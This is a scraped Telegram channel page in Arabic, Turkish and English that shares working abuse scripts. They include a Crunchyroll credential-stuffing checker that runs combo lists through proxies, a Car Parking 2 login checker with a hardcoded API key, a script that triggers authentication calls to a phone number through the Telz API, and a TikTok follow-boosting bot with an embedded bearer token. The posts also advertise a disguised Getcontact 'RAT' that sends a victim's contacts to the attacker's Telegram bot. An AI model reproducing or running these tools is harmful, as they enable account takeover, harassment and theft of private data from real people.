Арабский питон
Ir al canal en Telegram
Привет @durov Канал не нарушает правила Telegram. Нет спама, оскорблений, порнографии или нзаконной торговли. Пожалуйста, пересмотрите жалобы. Спасибо!
Mostrar más2 386
Suscriptores
-2024 horas
-3327 días
-2 10030 días
Archivo de publicaciones
2 377
import requests
import uuid
import time
import random
DEVICES = [
{"name": "TECNO KM7", "brand": "TECNO", "model": "TECNO KM7", "hardware": "mt6789", "os": "15", "sdk": "35", "build": "AP3A.240905.015.A2"},
{"name": "Samsung A03s", "brand": "samsung", "model": "SM-A035F", "hardware": "exynos850", "os": "13", "sdk": "33", "build": "TP1A.220624.014"},
{"name": "Xiaomi Note 12", "brand": "Xiaomi", "model": "23021RAAEG", "hardware": "qcom", "os": "13", "sdk": "33", "build": "TKQ1.221114.001"},
{"name": "Pixel 6a", "brand": "Google", "model": "Pixel 6a", "hardware": "bluejay", "os": "14", "sdk": "34", "build": "UQ1A.231205.015"},
]
def telz_call(phone):
d = random.choice(DEVICES)
android_id = uuid.uuid4().hex[:16]
uid = str(uuid.uuid4())
ts = int(time.time() * 1000)
headers = {"User-Agent": "Telz-Android/17.5.48", "Content-Type": "application/json; charset=UTF-8"}
requests.post("https://api.telz.com/app/run", json={
"android_id": android_id, "app_version": "17.5.48", "device_name": d["name"],
"event": "run", "ipv4_address": "10.0.0.1", "lang": "ar", "network_country": "iq",
"network_type": "4G", "os": "android", "os_version": d["os"], "push_token": "",
"roaming": "no", "root": "no", "run_id": "", "sim_country": "iq", "ts": ts, "uuid": uid
}, headers=headers)
requests.post("https://api.telz.com/app/validate_phonenumber", json={
"android_id": android_id, "app_version": "17.5.48", "event": "validate_phonenumber",
"os": "android", "os_version": d["os"], "phone": phone, "region": "IQ",
"ts": int(time.time() * 1000), "uuid": uid
}, headers=headers)
return requests.post("https://api.telz.com/app/auth_call", json={
"android_id": android_id, "app_version": "17.5.48", "attempt": "0",
"event": "auth_call", "lang": "ar", "os": "android", "os_version": d["os"],
"phone": phone, "ts": int(time.time() * 1000), "uuid": uid
}, headers=headers).json()
print(telz_call("+9647712743265"))2 377
+1
وايييي واحد مسويها عليها تخمين و صادت واني فحصت الحساب شغال اشوف تفاعل وانشرها +جوز اخليها تحفص الصيد ب ملف
لعب Car Parking 2
Wow, someone tried guessing and got it right! I checked the account, it's active, I'll see the interaction and post it. + I might have her save the catch in a file.
@r_9he✅
2 377
• بوت صنع صور مع مقاطع ڤيديو. • مجاني لمدة اسبوع. • تگدر تصنع فيديو وتگدر تصنع صورة، بداخله 3 نماذج. • أكواد VIP ل 7 ايام، ل 300 حساب لكل كود. •VIP82284325961778176015636504•VIP82284325961778176034442318•VIP82284325961778176055631680• بوت الصنع: @l_v_eBOT
• A bot for creating images and videos. • Free for one week. • You can create videos and images; it includes 3 templates. • VIP codes for 7 days, for 300 accounts per code. •VIP82284325961778176015636504•VIP82284325961778176034442318•VIP82284325961778176055631680• Bot for creating: @l_v_eBOT
2 377
2 377
لوجن لعبه Car Parking 2 شغال بدون مشاكل
🌚🌚🌚🌚🌚🌚🌚🌚🌚🌚
The game Car Parking 2's login is working without any problems.
import requests
import random
def generate_unity_version():
major = random.randint(2018, 2024)
minor = random.randint(1, 4)
patch = random.randint(0, 99)
build = random.choice(['f1', 'f2', 'c1', 'c2', 'p1', 'p2'])
return f"{major}.{minor}.{patch}{build}"
email = input("Enter Email: ")
password = input("Enter Password: ")
url = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword"
params = {
'key': "AIzaSyCQDz9rgjgmvmFkvVfmvr2-7fT4tfrzRRQ"
}
payload = "{\"email\":\"" + email + "\",\"password\":\"" + password + "\",\"returnSecureToken\":true,\"clientType\":\"CLIENT_TYPE_ANDROID\"}"
headers = {
'User-Agent': "UnityPlayer/2022.3.62f2 (UnityWebRequest/1.0, libcurl/8.10.1-DEV)",
'Accept-Encoding': "deflate, gzip",
'Content-Type': "application/octet-stream",
'X-Unity-Version': generate_unity_version()
}
response = requests.post(url, params=params, data=payload, headers=headers)
print(response.text)
الشخص الذي كسر العبه 👇
@r_9he✅
#ملاحظه الكود مرتب بل ai وبس لا تضل تمضرط براسي عود مبرمج مالي خلك ارتب2 377
تفيدكم لعبه
Car Parking 2مكسوره بل كامل +اريد حساب حتلو وهمي اجرب اسحب لوجن لل لعبه واشوفه شغال او لا اذا عدك حساب دزه هنا @r_9he✅
2 377
import requests
import uuid
import sys
import os
from user_agent import generate_user_agent
from concurrent.futures import ThreadPoolExecutor
hits, premium, free, bad = 0, 0, 0, 0
proxy = {
#proxy ned
}
def Check(line):
global hits, premium, free, bad
try:
email, password = line.strip().split(':')
session = requests.Session()
url = "https://beta-api.crunchyroll.com/auth/v1/token"
u_agent = generate_user_agent()
headers = {
"host": "beta-api.crunchyroll.com",
"content-type": "application/x-www-form-urlencoded",
"user-agent": u_agent
}
payload = {
"grant_type": "password",
"username": email,
"password": password,
"scope": "offline_access",
"client_id": "y2arvjb0h0rgvtizlovy",
"client_secret": "JVLvwdIpXvxU-qIBvT1M8oQTr1qlQJX2",
"device_id": str(uuid.uuid4()),
"device_type": "Redmi",
"device_name": "Redmi note 8 pro"
}
response = session.post(url, headers=headers, data=payload, proxies=proxy, timeout=7)
if "access_token" in response.text:
acc_token = response.json().get("access_token")
headers2 = {
"Authorization": "Bearer {}".format(acc_token),
"User-Agent": u_agent
}
info = session.get("https://beta-api.crunchyroll.com/accounts/v1/me", headers=headers2, proxies=proxy, timeout=7).json()
ext_id = info.get("external_id")
url2 = "https://www.crunchyroll.com/subs/v1/subscriptions/{}/products".format(ext_id)
data = session.get(url2, headers=headers2, proxies=proxy, timeout=7).json()
hits += 1
if data.get("total", 0) > 0:
premium += 1
item = data['items'][0]
plan = item.get('product', {}).get('sku', 'Premium')
hitss = "HIT\nEmail: {}\nPass: {}\nPlan: {}".format(email, password, plan)
with open("Premium.txt", "a") as f:
f.write(hitss + "\n" + "="*20 + "\n")
else:
free += 1
else:
bad += 1
except:
bad += 1
sys.stdout.write("\r\x1b[1;37mHits: \033[2;32m{} \x1b[1;37mPremium: \033[2;32m{} \x1b[1;37mFree: \033[2;35m{} \x1b[1;37mBad: \033[1;31m{}".format(hits, premium, free, bad))
sys.stdout.flush()
file = input("combo : ")
os.system('clear')
try:
with open(file, 'r') as f:
combos = f.readlines()
except FileNotFoundError:
sys.exit()
with ThreadPoolExecutor(max_workers=10) as executor:
executor.map(Check, combos)
sys.exit()
تشكـ ـير على تطبيق Crunchyroll يحتاج بروكـ ـسي + كومـ ـبو ويبلش يفحص
A checker on the Crunchyroll app needs a proxy + combo and will start checking.2 377
imbd sitesinde herhangi bir filmi yada diziyi linkin başına play yazarak izleyebilirsiniz.
You can watch any movie or series from IMDb by typing "play" at the beginning of the link.by : @YeniIgisiz
2 377
import requests
import json
import time
user = input('user : ')
url = "https://hextag.site/api/tiktok/users/{}/".format(user)
params = {
'include': "posts,account"
}
payload = {
"client_id": "124",
"client_secret": "V9WquJkQkmD64BNIIFotuQ5Xw2swP1lGQtejc2cx",
}
headers = {
'User-Agent': "Dart/3.9 (dart:io)",
'Accept': "application/json",
'Accept-Encoding': "gzip",
'Content-Type': "application/json",
'authorization': "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhdWQiOiIxMjQiLCJqdGkiOiIyMzM4OTFlYjM1NWZkNGY1MjlhMjFjMzkwMzhmZjQ4YmJlOTEwMjlkODM5MTc3YmQ0YzkxOWI1M2JlN2YzOGMyMGM2MzFiYjE1MTE4ZGEwNSIsImlhdCI6MTYzNzU3NDI4NSwibmJmIjoxNjM3NTc0Mjg1LCJleHAiOjI1ODQyNTkwODQsInN1YiI6IiIsInNjb3BlcyI6WyIqIl19.ATRuNcHnE7hKYsjXqGQdKa3wBhMsBJcHxxtW3rtmLyLi3z4fvvDk2sOtWIXQdSLdrlFV9ZycavrwNYXkCFiXDn8KMDPEWELptffALzqvaHp29S7crC1twoELGhDUEqAHv4U6NW1Jzmt7ymTi3Zj2tptLQq_tkvQAWZ1cZKtUjsa4RyA67Lvx9p8W-BlusgX0W3Z--3m5cNNDqr3csgloTqc6IE_mCGuZfvse8ynKiWy73PYVq265vRgrH4Mgoz0Gk-LB3MU93u61uCSa7yDjBIUUFQfu-z-lbJRcjGXbucrEaVo782foKFMd7cT7xmqvAKw_OijoY0YggUVvKtStlS49Htuti_nHjDGN-u1XFhoZp7dnFD5H4JF5wp42xaeVTLB62NDjlBlv_c44G89KFyCeq3UYOBTgU4GhXLhwPT4Rb9-zfYDz5vziqgZS98_lIxN-vqNhibDAD9KBt3X5TiHjuJJu0AMbPxXV0MGBAOSYNMFgGUd3N6xBzTIxDND8_hShIUdcgblTkzmcDgathg8qadp5_UbBIhBtXs5JtTmEH_3QABl8tHY5nQ4zw7FarsJOelDN1f6tUjEgaM2ZJvz1LTxy1GHhlCx9GEFHziG5-lt1T38Ii2qL8KNfP5Rl5UVKOTvP8SZ8cw7tZPuYI_XuLggKzL7jZS8PfWzXT6M",
'app-version': "16"
}
response = requests.post(url, params=params, data=json.dumps(payload), headers=headers)
print(response.text)
fid = response.json()['fid']
url = "https://hextag.site/api/authorizations"
payload = {
"grant_type": "password",
"client_id": "124",
"client_secret": "V9WquJkQkmD64BNIIFotuQ5Xw2swP1lGQtejc2cx",
"scope": "*",
"password": "password",
"username": "{}".format(fid)
}
headers = {
'User-Agent': "Dart/3.9 (dart:io)",
'Content-Type': "application/json",
}
response = requests.post(url, data=json.dumps(payload), headers=headers)
print(response.text)
access_token = response.json()['access_token']
while True:
url = "https://hextag.site/api/users/random"
params = {
'user_id': "20662452"
}
headers = {
'User-Agent': "Dart/3.9 (dart:io)",
'Accept': "application/json",
'authorization': "Bearer {}".format(access_token),
'app-version': "16"
}
response = requests.get(url, params=params, headers=headers)
print(response.text)
id = response.json()['id']
url = "https://hextag.site/api/tiktok/users/{}/scrape".format(str(id))
headers = {
'User-Agent': "Dart/3.9 (dart:io)",
'Accept': "application/json",
'authorization': "Bearer {}".format(access_token),
'app-version': "16"
}
response = requests.get(url, headers=headers)
print(response.text)
url = "https://hextag.site/api/events/follow-users"
payload = {
"user_id": str(id)
}
headers = {
'User-Agent': "Dart/3.9 (dart:io)",
'Accept': "application/json",
'Accept-Encoding': "gzip",
'Content-Type': "application/json",
'authorization': "Bearer {}".format(access_token),
'app-version': "16"
}
response = requests.post(url, data=json.dumps(payload), headers=headers)
print(response.text)
time.sleep(3)
تطبيق رشق tiktok يجمع نقاط لا تلعب بل وقت خلي اليوزر الي مخليه بل تطبيق وراح يجمع نقاط المهم حده عدد معين من وره تطبيق
The TikTok boosting app collects points, but don't play around with the time. Just enter the username you've set up in the app and it will collect points. The important thing is that it only collects a certain number of points through the app.2 377
Getcontact Premium Görünümlü rehber r@t
Tr:Assets klasöründeki i.json dosyasına id'nizi , t.json dosyasına ise tokeninizi koyun kurban girdiğinde rehberine kayıtlı telefon numaralari telegram botunuza düşecektir. Kullanımından ben sorumlu değilim!
Eng: Getcontact Premium-looking contact list r@t Put your ID in the i.json file and your token in the t.json file in the Assets folder. When the victim logs in, the phone numbers registered in the contact list will be sent to your Telegram bot. I am not responsible for its use!😏Dev: @YeniIgisiz
2 377
InstaGram Account Creator No Blocking account
Fast
Full source
Support proxy
@to_marko
¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
